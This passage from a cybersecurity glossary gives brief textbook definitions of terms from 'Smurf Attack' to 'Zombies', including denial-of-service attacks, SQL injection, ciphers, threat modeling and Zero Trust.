Smurf Attack - The Smurf attack works by spoofing the target address and sending a ping to the broadcast address for a remote network, which results in a large amount of ping replies being sent to the target.
Social Engineering - An attempt to trick someone into revealing information (e.g., a password) that can be used to attack systems or networks.
SOCKS - A protocol that a proxy server can use to accept requests from client users in a company's network so that it can forward them across the Internet. SOCKS uses sockets to represent and keep track of individual connections. The client side of SOCKS is built into certain Web browsers and the server side can be added to a proxy server.
Split Key - A cryptographic key that is divided into two or more separate data items that individually convey no knowledge of the whole key that results from combining the items.
SQL Injection - SQL injection is a type of input validation attack specific to database-driven applications where SQL code is inserted into application queries to manipulate the database.
Stack Mashing - Stack mashing is the technique of using a buffer overflow to trick a computer into executing arbitrary code.
Stream Cipher - A stream cipher works by encryption a message a single bit, byte, or computer word at a time.
Symmetric Cryptography - A branch of cryptography involving algorithms that use the same key for two different steps of the algorithm (such as encryption and decryption, or signature creation and signature verification). Symmetric cryptography is sometimes called "secret-key cryptography" (versus public-key cryptography) because the entities that share the key.
SYN Flood - A denial of service attack that sends a host more TCP SYN packets (request to synchronize sequence numbers, used when opening a connection) than the protocol implementation can handle.
Tactics, Techniques, and Procedures (TTPs) - The behavior of an actor. A tactic is the highest-level description of this behavior, while techniques give a more detailed description of behavior in the context of a tactic, and procedures an even lower-level, highly detailed description in the context of a technique.
Threat Assessment/Analysis - Process of formally evaluating the degree of threat to an information system or enterprise and describing the nature of the threat.
Threat Modeling - A form of risk assessment that models aspects of the attack and defense sides of a logical entity, such as a piece of data, an application, a host, a system, or an environment.
Threat Vector - The method a threat uses to get to the target.
Tiny Fragment Attack - With many IP implementations it is possible to impose an unusually small fragment size on outgoing packets. If the fragment size is made small enough to force some of a TCP packet's TCP header fields into the second fragment, filter rules that specify patterns for those fields will not match. If the filtering implementation does not enforce a minimum fragment size, a disallowed packet might be passed because it didn't hit a match in the filter. STD 5, RFC 791 states: Every Internet module must be able to forward a datagram of 68 octets without further fragmentation. This is because an Internet header may be up to 60 octets, and the minimum fragment is 8 octets.
Triple DES (3DES) - A block cipher, based on DES, that transforms each 64-bit plaintext block by applying the Data Encryption Algorithm three successive times, using either two or three different keys, for an effective key length of 112 or 168 bits.
Trojan Horse - A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program.
Trusted Ports - Trusted ports are ports below number 1024 usually allowed to be opened by the root user.
User Behavior Analytics (UBA) - User behavior analytics, sometimes called user entity behavior analytics (UEBA), is a category of software that helps security teams identify and respond to insider threats that might otherwise be overlooked. Using machine learning and analytics, UBA identifies and follows the behaviors of threat actors as they traverse enterprise environments, running data through a series of algorithms to detect actions that deviate from user norms.
Zero Day - The day a new vulnerability is made known. In some cases, a "zero day" exploit is referred to an exploit for which no patch is available yet.
Zero-day attack - A zero-day attack or threat is a computer threat that tries to exploit computer application vulnerabilities that are unknown to others or undisclosed to the software developer. Zero-day exploits (actual code that can use a security hole to carry out an attack) are used or shared by attackers before the software developer knows about the vulnerability.
Zero Trust - A collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per-request access decisions in information systems and services in the face of a network viewed as compromised.
Zombies - A zombie computer (often shortened as zombie) is a computer connected to the Internet that has been compromised by a hacker, a computer virus, or a trojan horse. Generally, a compromised machine is only one of many in a botnet, and will be used to perform malicious tasks of one sort or another under remote direction. Most owners of zombie computers are unaware that their system is being used in this way. Because the owner tends to be unaware, these computers are metaphorically compared to zombies.